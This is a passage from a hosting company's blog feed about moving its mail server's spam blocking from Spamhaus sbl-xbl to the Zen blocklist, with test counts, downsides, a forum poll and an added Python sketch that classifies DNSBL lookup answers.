<blockquote><p><strong>IP Address Self-Service Removal Mechanism</strong></p>
<p>A feature of the PBL is the elimination of &#8216;false positives&#8217; with a server-identifying and automatic removal mechanism for single IP addresses. This allows end users with static IP addresses within a larger dynamic pool, and legitimate mail server operators, to assert that in their opinion their IP addresses are a trustworthy source of email and to automatically remove (suppress) their IP addresses from the PBL database. Safeguards are built in to prevent abuse of this facility by spammers (and particularly by automated bots).</p></blockquote>
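<p>As an added example (not code from this post or from any HostNexus server), the sketch below shows how one DNSBL lookup against the combined zone is formed and how its answer separates the three lists described above, so the difference between enforcing sbl-xbl and enforcing zen is visible per sender. The return-code values are taken from Spamhaus&#8217;s published documentation rather than from this page, and the sample IPs and answers are constructed.</p>

```python
import ipaddress

# Return codes as published by Spamhaus for the combined zone (an assumption
# here: they are not stated on this page).
SBL = {"127.0.0.2", "127.0.0.3", "127.0.0.9"}
XBL = {"127.0.0.4", "127.0.0.5", "127.0.0.6", "127.0.0.7"}
PBL = {"127.0.0.10", "127.0.0.11"}
# Answers in 127.255.255.0/24 are error signals (e.g. query refused), never listings.
ERROR_NET = ipaddress.ip_network("127.255.255.0/24")

def query_name(client_ip, zone="zen.spamhaus.org"):
    """DNSBL convention: reverse the IPv4 octets and append the zone."""
    ip = ipaddress.IPv4Address(client_ip)
    return ".".join(reversed(str(ip).split("."))) + "." + zone

def classify(answers):
    """Map the A records returned for one lookup to component list names."""
    hits = set()
    for a in answers:
        if ipaddress.ip_address(a) in ERROR_NET:
            raise LookupError("DNSBL error code %s: do not treat as a listing" % a)
        for name, codes in (("SBL", SBL), ("XBL", XBL), ("PBL", PBL)):
            if a in codes:
                hits.add(name)
    return hits

def rejects(answers, lists_enforced):
    """True if a server enforcing only lists_enforced would refuse this sender."""
    return bool(classify(answers) & set(lists_enforced))

SBL_XBL = ("SBL", "XBL")      # coverage of sbl-xbl.spamhaus.org
ZEN = ("SBL", "XBL", "PBL")   # coverage of zen.spamhaus.org

# Constructed sample answers (documentation-range IPs, not real lookups).
SAMPLES = {
    "192.0.2.10": ["127.0.0.4"],                  # exploited machine
    "198.51.100.77": ["127.0.0.10"],              # ISP end-user range
    "203.0.113.5": ["127.0.0.2", "127.0.0.11"],   # listed on two lists
    "192.0.2.200": [],                            # no answer: not listed
}

if __name__ == "__main__":
    for ip, answers in SAMPLES.items():
        print(query_name(ip), sorted(classify(answers)),
              "sbl-xbl:", rejects(answers, SBL_XBL), "zen:", rejects(answers, ZEN))
```

<p>The PBL-only sender is the case that changes between the two configurations: it passes under sbl-xbl and is refused under zen. Error-range answers raise instead of counting as a listing, so a failed lookup cannot bounce legitimate mail.</p>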
<p>I fully tested zen.spamhaus.org on our server and these are the results averaged over 3 mail accounts in a 24 hour period:</p>
<ul>
<li><strong>No SpamHaus (only SpamCop): 165 spam tagged/10 spam untagged</strong></li>
<li><strong>With sbl-xbl.spamhaus.org: 105 spam tagged/7 spam untagged</strong></li>
<li><strong>(drumroll) With zen.spamhaus.org: 10 spam tagged/1 spam untagged</strong></li>
</ul>
<p>You have to admit, that is pretty awesome. <img src='http://www.hostnexus.com/blog/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>But let&#8217;s recap the downsides if we implement Zen:</p>
<p>1) Some people might have issues sending you mail.  If they are savvy enough they can click the link in the bounced mail and delist quickly but a lot of people are not going to do that.  Some might contact their host or ISP to get it resolved.  Some just might not send that email.</p>
<p>2) You (or your users) might not be able to send mail.  The upside of this downside is that you are all web savvy and know to delist.</p>
<p>I have <a href="http://www.hostnexus.com/forum/spam-filtering-tips-tricks-issues/12425-implementing-zen-discussion-feedback.html">posted a discussion thread with poll</a> on our forum.  Please comment here or in that thread and vote on that poll.  This would be a great thing to implement but everyone needs to be aware of it before we do and know how to resolve any issues if they experience them.</p>
<p>Thanks for your time. <img src='http://www.hostnexus.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.hostnexus.com/blog/the-zen-of-spamhaus/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
